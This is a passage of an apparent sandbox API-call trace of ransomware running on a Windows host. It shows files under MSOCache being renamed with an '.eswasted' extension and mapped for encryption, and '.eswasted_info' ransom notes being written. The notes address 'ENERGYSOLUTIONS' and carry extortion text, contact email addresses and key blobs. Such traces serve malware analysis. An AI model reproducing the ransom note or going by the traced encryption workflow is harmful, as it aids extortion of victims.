KEY:\r\n[begin_key]jNY9XhKl0CUYZb1JAfJb2ql7abPykAN6l1butNt7IgEi+FRVFJYs3jUY2cLfGVzt\r\nBBOlcmnBi2PtjmUxU7zznhOXiyYubCSyaxS/pslDEEu07/KyENfu57O8B5gY6Lyt\r\nYUgT1Gg7PK+3zEv2IadY33wZEeLFdRn1lIJZdiO6gsj690LarUDxSV28PVoTwGQE\r\nnag9wdgGJPqHdWoFufUs4sRYWxjJSUp2t2KDSTsB3JN5qJFi+iQk3dkVQO/MpW5R\r\nSlO61SvASvS6YtdCYeovdomUCqqlUZeSupQyi5xv43oRj5BTxbcv29/kntjxTuAg\r\nCQxXaF+JOYVGnvx4aTaxemuCm/myrXvZGGKDF8v9bM5KI7NNHL2byDSrquWA896E\r\ntgCsqTgtK3siicXy6jXdP6372oaD+YW6qjlJm5tgR0AW6brNDMwYvBCPItDlFYZR\r\nx3J87mcwsab/OxuMz/ljeUmSmyq0aYgy4ZMvH7pWn5pEgC0ocpLL2L2bvmabq5Zz\r\nTcVMncww3RYmfbuguKY3FdeZrheESWthKcCfeolMoOB9zKpH6p82A4EyowIS8XV0\r\nNwQGgK2400+ainvuBXv/H6L6JGFGfeOqYPEPOR+x+8m4sAs6d2aehZi82C569IMg\r\n+oXiTpOOHEB6Rk8q5ORB0KyGvwZir86o6sw9yeueDuK=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.666] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.666] WriteFile (in: hFile=0x11c, lpBuffer=0x1412460*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412460*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.666] SetEndOfFile (hFile=0x11c) returned 1 [0071.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412460 | out: hHeap=0x6d0000) returned 1 [0071.668] CloseHandle (hObject=0x11c) returned 1 [0071.670] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.670] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b9e8 | out: hHeap=0x6d0000) returned 1 [0071.670] _aulldvrm () returned 0x0 [0071.670] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.671] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.671] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.671] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0071.671] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x70b3c8 [0071.671] lstrcpyW (in: lpString1=0x70b466, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.671] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.671] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.672] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.672] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.672] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.673] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.674] SetEndOfFile (hFile=0x11c) returned 1 [0071.674] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.674] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.674] lstrcpyW (in: lpString1=0x70b466, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.eswasted")) returned 1 [0071.676] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.676] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0071.677] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x91975 [0071.677] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x1610000 [0071.677] CloseHandle (hObject=0x128) returned 1 [0071.699] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0071.718] CloseHandle (hObject=0x134) returned 1 [0071.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.718] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.719] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.719] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.719] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.720] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.720] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.728] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x7182b8 [0071.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.728] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x7186c8 [0071.728] _snwprintf (in: _Dest=0x7186c8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WwOZ0ObTmX0Knl0gslV2RU7+GDhIRX/xqwbl0lvEYI/twsGeL72lUYNSN0teSibV\r\no3ccDjm5rzakqrtFzEj/cCMNciY7eY7ETQqtRLvUzfT6Xv1VpZgWxmthlOGIlb5d\r\nFMaNJngkJR+aylOMTckkIe32FEUnUoNVECgD5SR28Cb45q91ZUg5PwQUPNkN5vQ7\r\nGml/Ka6IFYLECTHgBW4OQmPCgjIVRNB8/twOkCZoysZkziYT/ol7hKQyKbgBtGv4\r\nMkREQQY6nh3VUib3+NdYtI2pNy2rUfEQRtQTgDwGq2S9Pb4fbIDKojva3e1Mh1Lh\r\n3Oq+oauQrzclf0iBp2sskVdhmX4AT6abVOYqYFKFkFYeIcD1KeRmxKyR0HdOTerT\r\ngnHUP0BbGZgqr+TEQjLSEYMGFfY1cH3g4VXRJdxUfjt7jvRzqc26HvHfsBSbfCIm\r\n9VoezP6S9lPXcYf12vzMnGFIQDdLLJfZ7KgO1Sp9M/OaGUtPxQVrcAHkuXl2AZX8\r\nAiAAif1K4OMFEi6DS8lZOliS2Eh69JMUSzoHD9dghkALrGSuKeru8N05vU/r1LJC\r\nuKpGO4gkXn0x6ZDI09yDgXf5mXndPPCtStw8HZLmfiPMZkHSLzWhozHyrG/+Rppi\r\nUU0MZ7bgqD31d/4gbUpQ3J/dGGKGAv7bEus9Kuc3M8U=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7182b8 | out: hHeap=0x6d0000) returned 1 [0071.728] WriteFile (in: hFile=0x11c, lpBuffer=0x7186c8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x7186c8*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.728] SetEndOfFile (hFile=0x11c) returned 1 [0071.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7186c8 | out: hHeap=0x6d0000) returned 1 [0071.730] CloseHandle (hObject=0x11c) returned 1 [0071.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c258 | out: hHeap=0x6d0000) returned 1 [0071.732] _aulldvrm () returned 0x0 [0071.732] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.733] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.733] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.733] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0071.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c6) returned 0x7182b8 [0071.733] lstrcpyW (in: lpString1=0x718374, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x718588 [0071.733] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.734] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x718588 | out: pbBuffer=0x718588) returned 1 [0071.734] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.734] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.734] WriteFile (in: hFile=0x11c, lpBuffer=0x718588*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x718588*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.735] SetEndOfFile (hFile=0x11c) returned 1 [0071.735] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718588 | out: hHeap=0x6d0000) returned 1 [0071.735] lstrcpyW (in: lpString1=0x718374, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.eswasted")) returned 1 [0071.737] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0071.737] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.737] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x741 [0071.737] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x741) returned 0x330000 [0071.737] CloseHandle (hObject=0x134) returned 1 [0071.739] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.740] CloseHandle (hObject=0x128) returned 1 [0071.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.740] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.740] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.740] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.741] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.741] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.741] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.749] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x718588 [0071.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.750] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x718998 [0071.750] _snwprintf (in: _Dest=0x718998, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i/cQPgl7NFg0hDn6DNkFaKCZ0OxwhTF457KT7XDhkaQq+Q/ew0NP4vyvJtf0yyIJ\r\ngYwFmYvefdGp5Yhwzjpu1C/IRjMB0TpWkp3uJqYhrnSojcbr9yXLRNbOEIKdL43j\r\niMJuXCEowi4bSU7V46QclQ17vA+apdQRfIsC4BlDxnXApuk9hlm/sFLC9CucVnm6\r\narU73upWdid894BRueAYjYsyetjX/f2pbjnOr/3eJ5LH0F1w1YAZu4otisZnXRDJ\r\nKpIuJm/V+E8yMEVoYzCcDgJptdkOBc/SbQhBSQVck7wmCQIo42nX7SNZv5/QTzC7\r\naLF7J0aMpVEgInBQpghz+/YYGPP7S6cnkpTxpi9kSKoPybt9LoMz7n3x2Vzp/ZGl\r\ntrp2jrDUVwCfHkvRVXg2KYO5orEFzEFlXrTtdZxSE3gaoq1rIJHQpJJ+msURa+DT\r\n6Cx2pEywNUWSFnxfSfzlAZ9CkKUf1uQDzRWQ8Lx+QGNJ9bmnt82XYKTYCSytdxXc\r\nTv9bSTiQ7DVKu4OIOvBSYvOfrP++yD8nXvvbkDQLUxDMBbpIiNGiF83i3o34KhZz\r\n/3xUGBz3orymSkiyOTBYcrQY4Me1a1xwwio7xkZgJrnuAIvq1M3Kv6vJoW9AavcD\r\nn4rGQzcL9++11lIjsDQ6/M7fmta53f9RnFvKyZr9ttD=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718588 | out: hHeap=0x6d0000) returned 1 [0071.750] WriteFile (in: hFile=0x11c, lpBuffer=0x718998*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x718998*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.750] SetEndOfFile (hFile=0x11c) returned 1 [0071.752] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718998 | out: hHeap=0x6d0000) returned 1 [0071.752] CloseHandle (hObject=0x11c) returned 1 [0071.754] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7182b8 | out: hHeap=0x6d0000) returned 1 [0071.754] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0071.754] _aulldvrm () returned 0x0 [0071.755] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.755] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.755] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.755] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0071.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x70b3c8 [0071.755] lstrcpyW (in: lpString1=0x70b468, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x7182b8 [0071.756] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.756] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x7182b8 | out: pbBuffer=0x7182b8) returned 1 [0071.756] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.756] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.757] WriteFile (in: hFile=0x11c, lpBuffer=0x7182b8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x7182b8*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.758] SetEndOfFile (hFile=0x11c) returned 1 [0071.758] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7182b8 | out: hHeap=0x6d0000) returned 1 [0071.758] lstrcpyW (in: lpString1=0x70b468, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.eswasted")) returned 1 [0071.759] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.759] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0071.759] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x15b5 [0071.759] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15b5) returned 0x330000 [0071.759] CloseHandle (hObject=0x128) returned 1 [0071.769] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.770] CloseHandle (hObject=0x134) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.770] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.771] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.771] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.771] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.772] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.772] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x71b640 [0071.780] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71ba50 [0071.780] _snwprintf (in: _Dest=0x71ba50, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]usB8R693uHCYx7oN3/721qQCSKTV4ESJZ13ftyYq2v/douS2c4lxPjTcjQuUoxcY\r\nYCnj2BCrEOAwwfimzOtZBHEeFWmZpMiGi/+Crw7kZ5o4dYy6+4ZLSDIYbwMcLstk\r\nhfT/KsLDWvGj2lIgQsYR9x58RCsGESv6tIzGLC3kACqGDJvqvSbAl/T29LPnsrqF\r\ntCSiyQ0xC8moQiZduP9yFdKw1VgsqB6b74eXg/rJvb5GKl5NgBh4VEabmgnpCY/q\r\naYRHmA7TgjQ+snw7/6bJovU4l3ouEAFvyki9FCoIMqSK1syind8784pBJPyCZ5Me\r\nFDpYdjDFZZP5XJ4TD88FzmVcYc7N4UtEf/hQxgBBlMCfXqu2dk95j8UdFOzJ/Jkc\r\nBUwkMocur3hZIzmNae6N39BtsUtcPgf+/Bi0atSgkldd9PqsChxCidg91p9dSE2u\r\n4cAlzqyKpXexocgRvpIbNwp28xF6QLmnkVUlfQT4gf2NVXVv2wmXjESK4P/JY8qR\r\nOcrSwNY+5/TEbhjLwR1WKhAtCRoRtCABPYBtYIw8r8DXz8IRnp4BbRbmMC5QpZb0\r\nq6A2YLz/FLNndTneeY/26qoPgbTRfLZBT3kgqi/FirMkB9NP+mUq4Gaptn2/4BdR\r\nFZ2Kw+athNY2q/j3DcQbCKkE+CZXU8qY//+jYR+Vtqy=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.780] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.780] WriteFile (in: hFile=0x11c, lpBuffer=0x71ba50*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x71ba50*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.781] SetEndOfFile (hFile=0x11c) returned 1 [0071.783] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ba50 | out: hHeap=0x6d0000) returned 1 [0071.783] CloseHandle (hObject=0x11c) returned 1 [0071.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.785] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bae0 | out: hHeap=0x6d0000) returned 1 [0071.785] _aulldvrm () returned 0x0 [0071.785] CryptAcquireContextW (in: 